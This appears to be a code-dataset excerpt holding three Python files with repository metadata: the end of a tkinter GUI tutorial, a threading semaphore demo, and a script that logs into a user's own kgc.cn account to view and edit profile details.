menuBar.add_cascade(label="Help", menu=helpMenu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# Using tkinter Variable Classes
strData = tk.StringVar()
strData.set('Hello StringVar')
# It is not necessary to create a tk.StringVar()
strData = tk.StringVar()
strData = self.spin.get()
# Place cursor into name Entry
self.bookTitle.focus()
# Add a Tooltip to the Spinbox
ToolTip(self.spin, 'This is a Spin control.')
# Add Tooltips to more widgets
ToolTip(self.bookTitle, 'This is an Entry control.')
ToolTip(self.action, 'This is a Button control.')
ToolTip(self.scr, 'This is a ScrolledText control.')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
|
[
"noreply@github.com"
] |
actuarial-tools.noreply@github.com
|
839113b7423bd08946db266c62e3e63a9519e089
|
cbc5e5e32cdb04a16b3d2306f7d8dc265a86c47b
|
/py9/Test_Semaphore.py
|
0d640709f22e835dd46ded3338e1a7783df24eac
|
[] |
no_license
|
github-ygy/python_leisure
|
9821bd9feb6b5f05e98fd09ed1be1be56f3f8e35
|
f58ee2668771b1e334ef0a0b3e3fc7f6aacb8ccf
|
refs/heads/master
| 2021-01-23T06:15:27.715836
| 2017-10-31T16:56:44
| 2017-10-31T16:56:44
| 102,496,812
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
#!/usr/bin/env python
# author:ygy
import threading, time
def run(n):
semaphore.acquire() # take a slot from the semaphore counter (blocks when it reaches zero)
print("run the thread: %s" % n)
time.sleep(1)
print("off the thread:%s" % n)
semaphore.release() # give the slot back to the counter
# if __name__ == '__main__':
semaphore = threading.BoundedSemaphore(5) # allow at most 5 threads to run at the same time
for i in range(22):
t = threading.Thread(target=run, args=(i,))
t.start()
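# An equivalent, slightly more idiomatic guard (an editorial sketch, not part of the original test):
# using the semaphore as a context manager releases the slot even if the worker raises.
def run_with(n):
    with semaphore:
        print("run the thread: %s" % n)
        time.sleep(1)
        print("off the thread:%s" % n)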
|
[
"ygyworkforit@163.com"
] |
ygyworkforit@163.com
|
8b7cdf915356ccea4db3aa8f64482b9db8fd2025
|
0b95518353f172a0d3f53c3afb0608ab975974d2
|
/login/001-kgc/001-kgc.py
|
cb7dc0a736c884bdb998ef386df548563724bc16
|
[] |
no_license
|
uba888/uba_python
|
54b19e6483f5daacec6d2e0e5a4d9cf02ca2d7b5
|
1b63378ab86cda8221c6f7f9bad68c364874ccb6
|
refs/heads/master
| 2020-01-23T22:00:05.122331
| 2016-12-30T10:31:15
| 2016-12-30T10:31:15
| 74,717,680
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,812
|
py
|
#!/usr/bin/python3
import requests
import hashlib
from scrapy import Selector
import http.cookiejar as cookielib
# Build the request headers
headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'}
session=requests.session()
session.cookies = cookielib.LWPCookieJar(filename='cookies')
try:
session.cookies.load(ignore_discard=True)
except:
print("Cookie 未能加载")
# Simulate login
def login(username,password):
password=hashlib.md5(password.encode('utf-8')).hexdigest()
kgc_url='http://www.kgc.cn/member/login?redirect_url=http%3A%2F%2Fwww.kgc.cn%2F'
kgc_data={'UserLoginForm[redirect_url]': 'http://www.kgc.cn/', 'UserLoginForm[password]':password, 'UserLoginForm[username]':username}
session.get(kgc_url)
response=session.post(kgc_url,data=kgc_data,headers=headers)
xp=Selector(text=response.text)
username=xp.xpath('//span[@class="top-nick"]/text()').extract()
try:
username[0]
print("欢迎%s登陆成功" % (username[0]))
except:
print("登陆失败")
session.cookies.save()
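# Illustrative direct call (an editorial note, not part of the original script):
#   login('myuser', 'mypassword')   # username/password here are placeholders
# The helper MD5-hashes the password client-side, GETs the login page to pick up cookies,
# POSTs the form, and finally persists the session cookies to the 'cookies' file for reuse.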
# Update personal profile information
def personal_set():
config_headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'}
config_url='http://www.kgc.cn/my/member/modifyProfile'
realname=input('请输入您要修改的姓名:')
sign=input('请输入您要设置的个性签名:')
config_data={'sign': sign, 'realname':realname}
r3=session.post(config_url,data=config_data,headers=config_headers)
try:
print(r3.json())
print("修改成功")
except:
print("未修改成功,请检查")
# Query personal profile information
def select():
config_headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'}
response=session.get('http://www.kgc.cn/my/member/profile.shtml#self-zl',headers=config_headers)
hxs=Selector(text=response.text)
old_realname=hxs.xpath('//div[@class="self-zl self-common hide"]/form/div[1]/input/@value').extract()
old_sign=hxs.xpath('//div[@class="self-zl self-common hide"]/form/div[7]/input/@value').extract()
print("现在的姓名为:%s,现在的个性签名为:%s" % (old_realname,old_sign))
if __name__=="__main__":
while True:
print('''=================请选择相应菜单进行操作=================
1) 进行登陆
2) 修改个人信息
3) 查询个人信息
4) 退出菜单''')
choice=input("请选择你要进行的操作:")
if choice == "1":
username=input('请输入用户名:')
password=input('请输入密码:')
login(username,password)
elif choice == "2":
personal_set()
elif choice == "3":
select()
elif choice == "4":
print("谢谢使用!")
break
else:
print("输入错误,请重试")
|
[
"lsqtyihui@163.com"
] |
lsqtyihui@163.com
|